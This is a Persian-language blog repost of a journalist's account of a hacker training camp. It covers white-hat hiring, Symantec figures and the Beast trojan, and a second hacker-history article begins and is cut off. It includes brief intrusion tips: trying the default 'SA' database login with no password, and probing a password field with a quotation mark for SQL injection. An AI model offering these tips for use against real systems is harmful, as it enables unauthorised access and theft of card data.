ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺗﻬﺪﯾﺪﺍﺕ ﺍﻣﻨﯿﺘﯽ، ﺧﻮﺩ ﻫﻜﺮﻫﺎ ﺭﺍ ﺑﻪ ﺍﺳﺘﺨﺪﺍﻡ ﺩﺭﻣﯽﺁﻭﺭﺩﻧﺪ . ﺍﻣﺎ ﺍﯾﻦ ﻛﺎﺭ ﺑﺎﻋﺚ ﻣﯽﺷﺪ ﺁﻥﻫﺎ ﺑﺎ ﺗﺠﺮﺑﻪﺗﺮ ﺷﻮﻧﺪ ﻭ ﺑﻪ ﺗﻬﺪﯾﺪ ﺑﺰﺭﮒﺗﺮﯼ ﺗﺒﺪﯾﻞ ﺷﻮﻧﺪ . ﺍﯾﻨﺠﺎ ﺑﻮﺩ ﻛﻪ ﺁﻥﻫﺎ ﺑﻪ ﻓﻜﺮ ﭘﺮﻭﺭﺵ ﻣﺘﺨﺼﺼﺎﻧﯽ ﺩﺭ ﺩﺍﺧﻞ ﺳﺎﺯﻣﺎﻥ ﺧﻮﺩ ﺍﻓﺘﺎﺩﻧﺪ ﻛﻪ ﺑﻪ ﺁﻥﻫﺎ > ﻫﻜﺮ ﻛﻼﻩﺳﻔﯿﺪ < ﻣﯽﮔﻔﺘﻨﺪ . ﺍﻏﻠﺐ ﺗﻬﺪﯾﺪﺍﺕ ﺍﻟﻜﺘﺮﻭﻧﯿﻜﯽ ﺑﻨﺎ ﺑﻪ ﺍﻫﺪﺍﻑ ﻣﺎﻟﯽ ﺻﻮﺭﺕ ﻣﯽﮔﯿﺮﺩ . ﺁﻥﻫﺎ ﺗﻨﻬﺎ ﺑﻪ ﻧﯿﺖ ﺍﺯ ﻛﺎﺭ ﺍﻧﺪﺍﺧﺘﻦِ ﺷﺮﻛﺖﻫﺎﯼ ﺗﺠﺎﺭﯼ ﯾﺎ ﺁﺯﺍﺭﺭﺳﺎﻧﯽ ﺍﻗﺪﺍﻡ ﺑﻪ ﻭﯾﺮﻭﺱﻧﻮﯾﺴﯽ ﻧﻤﯽﻛﻨﻨﺪ . ﻫﺪﻑ ﺁﻥﻫﺎ ﺩﯾﮕﺮ ﻣﻌﺮﻭﻑﺷﺪﻥ ﻫﻢ ﻧﯿﺴﺖ . ﺁﻥﻫﺎ ﺑﻪ ﺩﻧﺒﺎﻝ ﻛﺴﺐ ﺩﺭﺁﻣﺪ ﺑﯿﺸﺘﺮ ﻫﺴﺘﻨﺪ . ﻃﺒﻖ ﺁﺧﺮﯾﻦ ﺁﻣﺎﺭﯼ ﻛﻪ ﺷﺮﻛﺖ ﺳﯿﻤﺎﻧﺘﻚ ﻣﻨﺘﺸﺮ ﻛﺮﻩ ﺍﺳﺖ، ﺣﻤﻼﺕ ﺍﯾﻨﺘﺮﻧﺘﯽ ﺑﻪ ﻣﻨﻈﻮﺭ ﻛﺸﻒ ﺍﺳﺮﺍﺭ ﻣﺤﺮﻣﺎﻧﻪ ﺑﺎ ﺭﺷﺪﯼ ۷۴ ﺩﺭﺻﺪﯼ ﺩﺭ ﻧﯿﻤﻪ ﺩﻭﻡ ۲۰۰۵، ﻫﺸﺘﺎﺩﺩﺭﺻﺪ ﻛﻞ ﺗﻬﺪﯾﺪﺍﺕ ﺭﺍ ﺷﺎﻣﻞ ﺷﺪﻩ ﺍﺳﺖ . ● ﻭﺍﻗﻌﯿﺖ ﻫﺸﺪﺍﺭ ﺩﻫﻨﺪﻩ ﻧﻜﺘﻪ ﺗﺮﺳﻨﺎﻙ ﺍﯾﻦ ﻣﻮﺿﻮﻉ ﺩﺭ ﺁﻥ ﺍﺳﺖ ﻛﻪ ﺑﺮﺍﯼ ﻫﻚ ﻛﺮﺩﻥ ﺩﯾﮕﺮ ﻻﺯﻡ ﻧﯿﺴﺖ ﻣﺘﺨﺼﺺ ﺳﻄﺢ ﺑﺎﻻ ﯾﺎ ﺑﺮﻧﺎﻣﻪﻧﻮﯾﺲ ﻗﻬّﺎﺭﯼ ﺑﺎﺷﯿﺪ . ﺧﻮﺩ ﻣﻦ ﻛﻪ ﺁﺧﺮﯾﻦ ﺑﺮﻧﺎﻣﻪ ﻛﺎﻣﭙﯿﻮﺗﺮﯾﻢ ﺭﺍ ﺩﺭ ﻛﻼﺱ ﺳﻮﻡ ﺩﺑﯿﺮﺳﺘﺎﻥ ﻭ ﺁﻥ ﻫﻢ ﺑﻪ ﺯﺑﺎﻥ ﺑﯿﺴﯿﻚ ﻧﻮﺷﺘﻪ ﺑﻮﺩﻡ، ﺑﺎ ﯾﻚ ﺳﺎﻋﺖ ﺣﻀﻮﺭ ﺩﺭ ﺍﺭﺩﻭ، ﺗﻮﺍﻧﺴﺘﻢ ﺑﻪ ﭘﺎﯾﮕﺎﻩ ﺩﺍﺩﻩ ﺑﺎﻧﻚ ﻣﺠﺎﺯﯼ ﻣﺎﯾﻜﺮﻭﺳﺎﻓﺖ ﻧﻔﻮﺫ ﻛﻨﻢ ﻭ ﺷﻤﺎﺭﻩ ﻛﺎﺭﺕﻫﺎﯼ ﺍﻋﺘﺒﺎﺭﯼ ﺭﺍ ﺩﺭﺁﻭﺭﻡ . ﺗﻨﻬﺎ ﻻﺯﻡ ﺍﺳﺖ ﻋﺎﺷﻖ ﺩﺍﻧﺴﺘﻦ ﺗﺮﻓﻨﺪﻫﺎ ﺑﺎﺷﯿﺪ . ﺑﺮﺍﯼ ﻣﺜﺎﻝ، ﻧﺎﻡ ﻛﺎﺭﺑﺮﯼ ﭘﯿﺶ ﻓﺮﺽ ﻣﺎﯾﻜﺮﻭﺳﺎﻓﺖ SA ﺍﺳﺖ ﻭ ﺑﺮﺍﯼ ﻛﻠﻤﻪ ﻋﺒﻮﺭ ﭘﯿﺶ ﻓﺮﺽ ﻧﺪﺍﺭﺩ . ﺧﯿﻠﯽ ﺍﺯ ﻣﺪﯾﺮﺍﻥ ﺷﺒﻜﻪ ﺍﯾﻦ ﻧﺎﻡ ﻛﺎﺭﺑﺮﯼ ﺭﺍ ﺗﻐﯿﯿﺮ ﻧﻤﯽﺩﻫﻨﺪ . ﺍﺯ ﺍﯾﻦ ﺭﻭ ﺧﯿﻠﯽ ﺍﺯ ﻫﻜﺮﻫﺎ ﺍﺑﺘﺪﺍ ﺁﻥ ﺭﺍ ﺍﻣﺘﺤﺎﻥ ﻣﯽﻛﻨﻨﺪ ﻛﻪ ﻣﻌﻤﻮﻻً ﻣﻮﻓﻖ ﻫﻢ ﺍﺯ ﺁﺏ ﺩﺭ ﻣﯽﺁﯾﺪ . ﯾﻚ ﻧﻜﺘﻪ ﺩﯾﮕﺮ ﻫﻢ ﺍﯾﻦ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﻣﺤﻞ ﻭﺭﻭﺩ ﻛﻠﻤﻪ ﻋﺒﻮﺭ، ﻋﻼﻣﺖ ﻧﻘﻞ ﻗﻮﻝ (") ﺭﺍ ﻗﺮﺍﺭ ﺩﻫﯿﺪ . ﺍﮔﺮ ﭘﯿﻐﺎﻡ ﺧﻄﺎﯾﯽ ﺻﺎﺩﺭ ﺷﺪ، ﺑﺪﺍﻧﯿﺪ ﺁﻥ ﭘﺎﯾﮕﺎﻩ ﺩﺍﺩﻩ ﺭﺍ ﻣﯽﺗﻮﺍﻥ ﺑﻪ ﺭﻭﺷﯽ ﺑﻪ ﻧﺎﻡ SQL Injection ﻫﻚ ﻛﺮﺩ . ﻭﯾﺘﺎﻛﺮ ﭘﺲ ﺍﺯ ﮔﻔﺘﻦ ﺍﯾﻦ ﻧﻜﺘﻪ ﺩﻭﺑﺎﺭﻩ ﺑﺎ ﻫﯿﺠﺎﻥ ﭘﺮﺳﯿﺪ : ﺟﺎﻟﺐ ﺑﻮﺩ؟ ﺩﻭﺳﺖ ﺩﺍﺭﯾﺪ ﺑﺎﺯ ﻫﻢ ﺍﺯ ﺍﯾﻦ ﻧﻜﺎﺕ ﺑﺪﺍﻧﯿﺪ؟ ● ﺩﺭ ﺩﺳﺘﺮﺱ ﻫﻤﻪ ﭘﺎﯾﮕﺎﻫﯽ ﻛﻪ ﻣﻦ ﻫﻚ ﻛﺮﺩﻡ، ﯾﻚ ﭘﺎﯾﮕﺎﻩ ﺣﻘﯿﻘﯽ ﻧﺒﻮﺩ . ﺑﺮﺍﯼ ﯾﻚ ﻛﺎﺭ ﻭﺍﻗﻌﯽ ﺑﻪ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻞﻫﺎﯼ ﺑﺴﯿﺎﺭ ﺑﯿﺸﺘﺮﯼ ﻧﯿﺎﺯ ﺍﺳﺖ . ﺍﻣﺎ ﻭﯾﺘﺎﻛﺮ ﮔﻔﺖ ﻛﻪ ﺗﻌﺪﺍﺩ ﺯﯾﺎﺩﯼ ﺍﺯ ﭘﺎﯾﮕﺎﻩﻫﺎﯼ ﻣﻮﺟﻮﺩ ﺩﺭ ﺷﺒﻜﻪ ﺍﺯ ﻫﻤﯿﻦ ﻧﻮﻉ ﻫﺴﺘﻨﺪ؛ ﺯﯾﺮﺍ ﻣﺪﯾﺮﺍﻥ ﺍﺯ ﺍﻣﻨﯿﺖ ﭼﯿﺰﯼ ﻧﻤﯽﺩﺍﻧﻨﺪ ﻭ ﻣﺪﯾﺮﺍﻥ ﺍﻣﻨﯿﺘﯽ، ﭘﺎﯾﮕﺎﻩ ﺩﺍﺩﻩ ﺭﺍ ﺧﻮﺏ ﻧﻤﯽﺷﻨﺎﺳﻨﺪ . ﺣﺎﻝ ﻓﻜﺮ ﺑﻜﻨﯿﺪ ﺍﮔﺮ ﻣﻦ ﻣﯽﺗﻮﺍﻧﻢ ﺭﻭﺵ ﻫﻚ ﻛﺮﺩﻥ ﭘﺎﯾﮕﺎﻩ ﺩﺍﺩﻩﻫﺎﯼ ﺍﻭﻟﯿﻪ ﺭﺍ ﺑﻪ ﺍﯾﻦ ﺳﺎﺩﮔﯽ ﺑﯿﺎﻣﻮﺯﻡ، ﯾﻚ ﻓﺮﺩ ﻣﺎﻫﺮ ﭼﻪ ﺑﻼﯾﯽ ﻣﯽﺗﻮﺍﻧﺪ ﺑﺮ ﺳﺮ ﺁﻥﻫﺎ ﺑﯿﺎﻭﺭﺩ؟ ﺑﺎ ﺗﻌﺠﺐ ﭘﺮﺳﯿﺪﻡ: ﺁﯾﺎ ﺁﻥﻫﺎ ﺍﻃﻤﯿﻨﺎﻥ ﺩﺍﺭﻧﺪ ﻛﻪ ﻫﻜﺮﻫﺎﯼ ﺍﺧﻼﻗﻤﻨﺪﺷﺎﻥ ﺧﻄﺎ ﻧﻤﯽﻛﻨﻨﺪ؟ ﻭﯾﺘﺎﻛﺮ ﭘﺎﺳﺦ ﺩﺍﺩ : ﻫﻤﯿﺸﻪ ﺍﻓﺮﺍﺩﯼ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺍﺯ ﺗﺨﺼﺼﺸﺎﻥ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ، ﺍﻣﺎ ﺁﻥﻫﺎ ﺑﺎ ﺗﻤﺎﻣﯽ ﺗﻮﺍﻥ، ﺩﺍﻧﺶﺁﻣﻮﺧﺘﮕﺎﻥ ﺧﻮﺩ ﺭﺍ ﺗﺤﺖ ﻧﻈﺮ ﺩﺍﺭﻧﺪ . ﺁﻥﻫﺎ ﺭﺍ ﺑﺎ ﺣﻘﻮﻕ ﺧﻮﺑﯽ ﺍﺳﺘﺨﺪﺍﻡ ﻣﯽﻛﻨﻨﺪ ﻭ ﺩﺭ ﺿﻤﻦ ﺿﻤﺎﻧﺖﻧﺎﻣﻪﺍﯼ ﻧﯿﺰ ﻣﺒﻨﯽ ﺑﺮ ﻋﺪﻡ ﺗﺨﻄﯽ ﺍﺯ ﺍﺻﻮﻝ ﺍﺧﻼﻕ ﺣﺮﻓﻪﺍﯼ ﻧﯿﺰ ﺍﻣﻀﺎ ﻣﯽﻛﻨﻨﺪ . ﺩﺭ ﻛﻼﺱﻫﺎﯼ ﺳﻄﺢ ﺑﺎﻻﺗﺮ، ﭘﯿﺸﯿﻨﻪ ﺍﻓﺮﺍﺩ ﻫﻢ ﻣﻮﺭﺩ ﺑﺮﺭﺳﯽ ﻗﺮﺍﺭ ﻣﯽﮔﯿﺮﺩ . ﺑﺎ ﺍﯾﻦ ﻫﻤﻪ، ﺍﯾﻦ ﺭﻭﺯﻫﺎ ﻛﺴﯽ ﻛﻪ ﺑﺨﻮﺍﻫﺪ ﻫﻜﺮ ﺷﻮﺩ، ﺭﺍﻩ ﺧﻮﺩ ﺭﺍ ﭘﯿﺪﺍ ﻣﯽﻛﻨﺪ؛ ﭼﻪ ﺑﺎ ﺍﯾﻦ ﻛﻼﺱﻫﺎ ﭼﻪ ﺑﺪﻭﻥ ﺍﯾﻦ ﻛﻼﺱﻫﺎ ! ﺣﺠﻢ ﺑﺎﻻﯾﯽ ﺍﺯ ﻣﻄﺎﻟﺐ ﺁﻣﻮﺯﺷﯽ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﯾﻦ ﺣﻮﺯﻩ، ﺩﺭ ﺍﯾﻨﺘﺮﻧﺖ ﯾﺎﻓﺖ ﻣﯽﺷﻮﺩ . ﻣﺎﻧﻨﺪ ﺑﺴﯿﺎﺭﯼ ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﯼ ﻋﻤﻮﻣﯽ ﻛﻪ ﺍﻓﺮﺍﺩ ﺑﺎ ﻧﻮﺷﺘﻦ ﻛﺪﻫﺎ ﻭ ﭘﺎﯾﮕﺎﻩ ﺩﺍﺩﻩ ﺁﻥﻫﺎ ﺭﺍ ﺑﻪ ﺻﻮﺭﺕ ﺭﺍﯾﮕﺎﻥ ﺩﺭ ﺷﺒﻜﻪ ﻗﺮﺍﺭ ﻣﯽﺩﻫﻨﺪ ﺗﺎ ﺩﯾﮕﺮﺍﻥ ﻧﯿﺰ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺩﺭ ﺑﺴﻂ ﻭ ﮔﺴﺘﺮﺵ ﺁﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺳﻬﯿﻢ ﺷﻮﻧﺪ، ﻣﻨﺎﺑﻊ ﺑﺎﺯ ﺑﺴﯿﺎﺭ ﺯﯾﺎﺩﯼ ﺭﺍ ﺑﺮﺍﯼ ﻧﮕﺎﺭﺵ ﻭﯾﺮﻭﺱ ﻭ ﺗﺮﻭﺟﺎﻥ ﻣﯽﺗﻮﺍﻥ ﺩﺭ ﺍﯾﻨﺘﺮﻧﺖ ﭘﯿﺪﺍ ﻛﺮﺩ . ● ﺯﯾﺒﺎﯼ ﺗﺮﺳﻨﺎﻙ ! ﭘﺲ ﺍﺯ ﺷﺶ ﺳﺎﻋﺖ ﻛﻼﺱ ﻓﺸﺮﺩﻩ، ﻧﻮﺑﺖ ﺑﻪ ﻛﺎﺭﺑﺮﺩ ﺁﻧﭽﻪ ﻛﻪ ﺗﺪﺭﯾﺲ ﺷﺪ ﺭﺳﯿﺪ؛ ﻫﻚ ﺷﻤﺎﺭﻩ ﻛﺎﺭﺕﻫﺎﯼ ﺍﻋﺘﺒﺎﺭﯼ ﺍﺯ ﯾﻚ ﺑﺎﻧﻚ ﻭ ﺍﯾﻤﯿﻞ ﺁﻥ ﺑﻪ ﻫﻤﺎﻥ ﺑﺎﻧﻚ ! ﻣﻦ ﺑﺎﯾﺪ ﻣﯽﭘﺬﯾﺮﻓﺘﻢ ﺑﺮﺍﯼ ﻛﺴﯽ ﻛﻪ ﺳﺎﻝﻫﺎ ﭘﯿﺶ ﺗﻨﻬﺎ ﯾﻚ ﺑﺮﻧﺎﻣﻪ ﺳﺎﺩﻩ ﺁﻥ ﻫﻢ ﺑﻪ ﺯﺑﺎﻥ ﺑﯿﺴﯿﻚ ﻧﻮﺷﺘﻪ ﺍﺳﺖ، ﺍﯾﻦ ﻛﺎﺭ ﭘﯿﭽﯿﺪﻩ ﺍﺳﺖ . ﺍﺯ ﺍﯾﻦ ﺭﻭ ﻭﻗﺘﯽ ﻭﯾﺘﺎﻛﺮ ﺑﻪ ﺳﺮﺍﻏﻢ ﺁﻣﺪ ﺗﺎ ﺑﻪ ﻣﻦ ﻧﺸﺎﻥ ﺩﻫﺪ ﭼﮕﻮﻧﻪ ﯾﻚ ﻛﺎﻣﭙﯿﻮﺗﺮ ﺩﯾﮕﺮ ﺭﺍ ﺑﻪ ﺗﺮﻭﺟﺎﻧﯽ ﺑﻪ ﻧﺎﻡ Beast ﺁﻟﻮﺩﻩ ﻣﯽﻛﻨﺪ، ﺍﺻﻼً ﻣﯿﻞ ﻭ ﺭﻏﺒﺘﯽ ﻧﺸﺎﻥ ﻧﺪﺍﺩﻡ . Beast ﺭﺍ ﯾﻚ ﺩﺍﻧﺸﺠﻮ ﻧﻮﺷﺘﻪ ﺑﻮﺩ ﻛﻪ ﻣﯽﺗﻮﺍﻧﺴﺖ ﺍﻋﻤﺎﻝ ﻃﺮﻑ ﺩﯾﮕﺮ ﺭﺍ ﺗﺤﺖ ﻧﻈﺮ ﺑﮕﯿﺮﺩ . ﺑﻨﺎﺑﺮﺍﯾﻦ ﺗﺎ ﺁﻧﺠﺎ ﻛﻪ ﺗﻮﺍﻧﺴﺘﻪ ﺑﻮﺩ، ﺭﻭﯼ ﺁﻥ ﻛﺎﺭ ﻛﺮﺩﻩ ﺑﻮﺩ . ﺍﯾﻦ ﺑﺮﻧﺎﻣﻪ ﺩﺭ ﺍﺻﻞ ﺑﺮﺍﯼ ﻛﻨﺘﺮﻝ webcam ﺍﺗﺎﻕ ﻗﺮﺑﺎﻧﯽ ﻧﻮﺷﺘﻪ ﺷﺪﻩ ﺑﻮﺩ، ﺍﻣﺎ ﻣﯽﺗﻮﺍﻧﺴﺖ CD ﺩﺭﺍﯾﻮ، ﺟﺴﺖﻭﺟﻮﮔﺮ ﺍﯾﻨﺘﺮﻧﺖ، ﭘﻨﺠﺮﻩﻫﺎﯼ ﭼﺖ ﻭ ﻫﺮ ﭼﯿﺰ ﺩﯾﮕﺮﯼ ﺭﺍ ﻛﻨﺘﺮﻝ ﻛﻨﺪ . ﺍﻣﺮﻭﺯﻩ ﺷﻤﺎ ﻣﯽﺗﻮﺍﻧﯿﺪ ﺁﻥ ﺭﺍ ﺑﻪ ﺻﻮﺭﺕ ﺭﺍﯾﮕﺎﻥ ﺩﺍﻧﻠﻮﺩ ﻛﻨﯿﺪ . ﺍﻟﺒﺘﻪ ﺍﻏﻠﺐ ﺑﺮﻧﺎﻣﻪﻫﺎﯼ ﺍﻣﻨﯿﺘﯽ ﻣﯽﺗﻮﺍﻧﻨﺪ ﺁﻥ ﺭﺍ ﻛﺸﻒ ﻛﻨﻨﺪ، ﺍﻣﺎ ﻧﯿﻤﯽ ﺍﺯ ﺭﺍﯾﺎﻧﻪﻫﺎﯼ ﺍﯾﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻓﺎﻗﺪ ﭼﻨﯿﻦ ﺑﺮﻧﺎﻣﻪﻫﺎﯾﯽ ﻫﺴﺘﻨﺪ ﻭ ﺩﺭ ﻫﺮ ﺣﺎﻝ ﺍﻓﺮﺍﺩﯼ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺎ ﺩﺭﯾﺎﻓﺖ ﻛﻤﯽ ﭘﻮﻝ، ﺑﺮﻧﺎﻣﻪﻫﺎﯾﯽ ﺑﻨﻮﯾﺴﻨﺪ ﻛﻪ ﻗﺎﺑﻞ ﺷﻨﺎﺳﺎﯾﯽ ﻫﻢ ﻧﺒﺎﺷﺪ . ● ﻭﺍﻗﻌﯿﺖ ﻭ ﺭﻭِﯾﺎ ﻃﺒﻖ ﺁﻣﺎﺭ ﺳﯿﻤﺎﻧﺘﻚ، ﺍﻏﻠﺐ ﻫﻜﺮﻫﺎ ﺍﺯ ﺩﻭﺷﻨﺒﻪ ﺗﺎ ﺟﻤﻌﻪ ﺍﺯ ﺳﺎﻋﺖ ﻧُﻪ ﺻﺒﺢ ﺗﺎ ﭘﻨﺞ ﺑﻌﺪﺍﺯﻇﻬﺮ ﻛﺎﺭ ﻣﯽﻛﻨﻨﺪ؛ ﮔﻮﯾﯽ ﺷﻐﻠﺸﺎﻥ ﺍﯾﻦ ﺍﺳﺖ ! ﺩﯾﻮﯾﺪ ﻛﻮﻝ، ﻣﺪﯾﺮ ﺳﯿﻤﺎﻧﺘﻚ ﻛﻪ ﺧﻮﺩ ﻣﺎﻩﻫﺎ ﻓﻌﺎﻟﯿﺖ ﺁﻧﻼﯾﻦ ﻫﻜﺮﻫﺎ ﺭﺍ ﺯﯾﺮ ﻧﻈﺮ ﺩﺍﺷﺖ ﻣﯽﮔﻮﯾﺪ : ﺧﻮﻧﺴﺮﺩﯼ ﺁﻥﻫﺎ ﺩﺭ ﺑﺮﺍﺑﺮ ﺗﺨﻠﻔﺎﺕ ﻗﺎﻧﻮﻧﯽ ﻭ ﻣﯿﺰﺍﻥ ﺗﺨﺮﯾﺒﯽ ﻛﻪ ﺍﺯ ﻧﻈﺮ ﺍﻗﺘﺼﺎﺩﯼ ﻭﺍﺭﺩ ﻣﯽﻛﻨﻨﺪ، ﺑﺮﺍﯼ ﻣﺎ ﺗﻌﺠﺐ ﺑﺮﺍﻧﮕﯿﺰ ﺍﺳﺖ . ﭼﻨﺪ ﺭﻭﺯ ﭘﯿﺶ ﺍﺯ ﻭﯾﺘﺎﻛﺮ ﭘﺮﺳﯿﺪﻡ: ﭼﻪ ﺍﺣﺴﺎﺳﯽ ﻧﺴﺒﺖ ﺑﻪ ﻓﯿﻠﻢ ﺳﯿﻨﻤﺎﯾﯽ ﻓﺎﯾﺮﻭﺍﻝ ﺩﺍﺭﺩ؟ ﺩﺭ ﺍﯾﻦ ﻓﯿﻠﻢ ﻫﺮﯾﺴﻮﻥ ﻓﻮﺭﺩ ﺩﺍﺳﺘﺎﻥ ﯾﻚ ﻣﺘﺨﺼﺺ ﺍﻣﻨﯿﺖ ﺍﻟﻜﺘﺮﻭﻧﯿﻚ ﺭﺍ ﺑﻪ ﺗﺼﻮﯾﺮ ﻛﺸﯿﺪﻩﺍﺳﺖ ﻛﻪ ﺩﺯﺩﺍﻥ ﻭﯼ ﺭﺍ ﻣﺠﺒﻮﺭ ﻣﯽﻛﻨﻨﺪ ﺑﺮﺍﯼ ﺁﺯﺍﺩﯼ ﻓﺮﺯﻧﺪﺵ، ﺍﻃﻼﻋﺎﺕ ﺑﺎﻧﻜﯽ ﺭﺍ ﻫﻚ ﻛﻨﺪ ﻛﻪ ﺧﻮﺩ ﻣﺴﺌِﻮﻟﯿﺖ ﺣﻔﺎﻇﺖ ﺍﺯ ﺁﻥ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﺩﺍﺭﺩ . ﺍﻭ ﺑﺎ ﺁﺭﺍﻣﺶ ﺟﻮﺍﺏ ﺩﺍﺩ: > ﺍﻣﺎ ﭼﯿﺰﯼ ﻛﻪ ﺩﺭ ﺩﻧﯿﺎﯼ ﻭﺍﻗﻌﯽ ﺭﺥ ﻣﯽﺩﻫﺪ، ﺑﺎ ﺩﻧﯿﺎﯼ ﻓﯿﻠﻢ ﺗﻔﺎﻭﺕ ﺩﺍﺭﺩ <. ﺑﻌﺪ ﺍﺯ ﯾﻚ ﺭﻭﺯ ﺣﻀﻮﺭ ﺩﺭ ﺍﺭﺩﻭﯼ ﻫﻜﺮﻫﺎ، ﺣﺮﻑ ﺍﻭ ﺭﺍ ﺩﺭﻙ ﻛﺮﺩﻡ: ﺩﻧﯿﺎﯼ ﻭﺍﻗﻌﯽ ﺗﺮﺳﻨﺎﻙﺗﺮ ﺍﺳﺖ ترجمه: سهیل نقدی

برچسب: ﺁﻧﭽﻪ ﺩﺭ ﮐﻤﭗ ﻫﮑﺮﻫﺎ ﺁﻣﻮﺧﺘﻢ, نویسنده: SASHA PAYDAR تاريخ: دوشنبه 9 شهريور 1394 ساعت: 8:59

ﻗﺼﺪ ﺩﺍﺭﯾﻢ ﺑﺎ ﺷﻤﺎ ﺩﺭ ﻣﻮﺭﺩ ﻫﮏ ﻭ ﻫﮑﺮﻫﺎ ﺻﺤﺒﺖ ﮐﻨﯿﻢ . ﺍﻭﺍﯾﻞ ﺑﺮﻧﺎﻣﻪﻫﺎﯼ ﮐﻮﭼﮑﯽ ﺗﻮﺳﻂ ﺑﺮﻧﺎﻣﻪﻧﻮﯾﺴﺎﻥ ﺑﻨﺎﻡ ”Hacks“ ﻧﻮﺷﺘﻪ ﻣﯽﺷﺪ ﮐﻪ ﺷﻮﺧﯽﻫﺎﯼ ﺑﯽﺿﺮﺭ، ﺩﺳﺘﺮﺳﯽﻫﺎﯼ ﺑﯽﺍﺟﺎﺯﻩ ﻭ ﺑﺮﮔﺮﻓﺘﻪ ﺍﺯ ﺍﺣﺴﺎﺱ “ ﺟﻠﻮﯼ ﻣﻦ ﺣﺼﺎﺭ ﻧﮑﺶ ” ﺑﻮﺩ، ﺍﻣﺎ ﺍﮐﻨﻮﻥ ﺗﺒﺪﯾﻞ ﺑﻪ ﺯﯾﺎﻥﻫﺎﯼ ﺟﺪﯼ ﺷﺪﻩ ﺍﺳﺖ ﮐﻪ ﺑﻪ ﺳﯿﺴﺘﻤﻬﺎ ﻭﺍﺭﺩ ﻣﯽﺷﻮﺩ . ﺑﻬﺮﺣﺎﻝ ﺩﺭ ﺑﻌﻀﯽ ﺍﻭﻗﺎﺕ، ﻫﮑﺮﻫﺎ ﺑﺮﺍﯼ ﺳﺎﺯﻣﺎﻥﻫﺎ ﻣﻔﯿﺪ ﻫﺴﺘﻨﺪ ﻭ ﺑﻌﻨﻮﺍﻥ ﻣﺤﺎﻓﻆ ﻋﻤﻞ ﻣﯽﮐﻨﻨﺪ . ﺑﺪ ﻧﯿﺴﺖ ﮐﻪ ﺑﺎ ﻓﺮﻫﻨﮓ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﯼ ﺍﯾﻦ ﮔﺮﻭﻩ ﺍﺯ ﺍﻓﺮﺍﺩ ﺁﺷﻨﺎ ﺷﻮﯾﻢ . ﺑﻨﺎﺑﻪ ﺗﻌﺮﯾﻒ، ﺁﻧﻬﺎ ﺍﻓﺮﺍﺩ ﯾﺎ ﮔﺮﻭﻫﻬﺎﯾﯽ ﺍﺯ ﺍﻓﺮﺍﺩ ﺑﺎ ﺍﻧﮕﯿﺰﻩﻫﺎﯼ ﻣﺘﻔﺎﻭﺕ ﻫﺴﺘﻨﺪ ﮐﻪ ﺍﻣﻨﯿﺖ ﯾﮏ ﺳﺎﺯﻣﺎﻥ ﯾﺎ ﯾﮏ ﻓﺮﺩ ﺭﺍ ﺑﻪ ﻣﺨﺎﻃﺮﻩ ﻣﯽﺍﻧﺪﺍﺯﻧﺪ . ﺁﻧﻬﺎ ﮐﺎﻭﺷﮕﺮﺍﻥ ﻗﻠﻤﺮﻭﻫﺎﯼ ﺟﺪﯾﺪ ﻫﺴﺘﻨﺪ . ﺑﻌﻀﯽ ﺑﺮﺍﯼ ﻣﻨﺎﻓﻊ ﺷﺨﺼﯽ ﻭ ﺑﻌﻀﯽ ﺑﺮﺍﯼ ﺳﻮﺩﺭﺳﺎﻧﺪﻥ ﺑﻪ ﺩﯾﮕﺮﺍﻥ . ﺍﻃﻼﻉ ﺩﺍﺷﺘﻦ ﺍﺯ ﺗﺎﺭﯾﺦ ﻫﮏ ﺭﺍﻩ ﻭ ﺁﯾﻨﺪﻩ ﺍﺣﺘﻤﺎﻟﯽ ﺁﻥ ﺭﺍ ﻣﺸﺨﺺ ﻣﯽﮐﻨﺪ . ﻣﻄﺎﻟﻌﻪ ﺩﺭ ﻣﻮﺭﺩ ﻫﮑﺮﻫﺎﯼ ﺑﺮﺟﺴﺘﻪ ﻭ ﺩﺍﺧﻞﺷﺪﻧﻬﺎﯼ ﺑﯽﺍﺟﺎﺯﻩ ﺁﻧﻬﺎ ﺑﻪ ﺳﯿﺴﺘﻤﻬﺎ ﺑﻪ ﺍﻓﺰﺍﯾﺶ ﺁﮔﺎﻫﯽ ﺩﺭ ﺍﯾﻦ ﻣﻮﺭﺩ ﮐﻤﮏ ﻣﯽﮐﻨﺪ . ● ﻫﮑﺮﻫﺎ ﮐﯿﺴﺘﻨﺪ؟ ﺍﺻﻄﻼﺡ “ ﻫﮏ ” ﺑﻪ ﻣﯿﺎﻧﺒﺮ ﺍﯾﺠﺎﺩ ﺷﺪﻩ ﺩﺭ ﯾﮏ ﺑﺮﻧﺎﻣﻪ ﺑﺮﺍﯼ ﺍﻧﺠﺎﻡ ﺳﺮﯾﻌﺘﺮ ﮐﺎﺭ، ﺍﺷﺎﺭﻩ ﻣﯽﮐﻨﺪ . ( ﺍﯾﻦ ﺗﻌﺮﯾﻔﯽ ﺍﺳﺖ ﮐﻪ ﺑﺎ ﭘﯿﺪﺍﯾﺶ ﺍﯾﻦ ﮐﻠﻤﻪ ﻫﻤﺮﺍﻩ ﺁﻥ ﺑﻮﺩﻩ ﺍﺳﺖ . ) ﻃﺒﻖ ﯾﮏ ﺧﺮﺩﻩﻓﺮﻫﻨﮓ، ﻫﮑﺮﻫﺎ ﺳﻌﯽ ﺩﺭ ﭘﻨﻬﺎﻥ ﮐﺮﺩﻥ ﻫﻮﯾﺖ ﻭﺍﻗﻌﯽ ﺧﻮﺩ ﻣﯽﮐﻨﻨﺪ، ﻫﺮﭼﻨﺪ ﻣﻄﺎﻟﻌﺎﺕ ﻧﺸﺎﻥ ﺩﺍﺩﻩ ﺍﺳﺖ ﮐﻪ ﺑﻌﻀﯽ ﺍﺯ ﺁﻧﻬﺎ ﺍﺯ 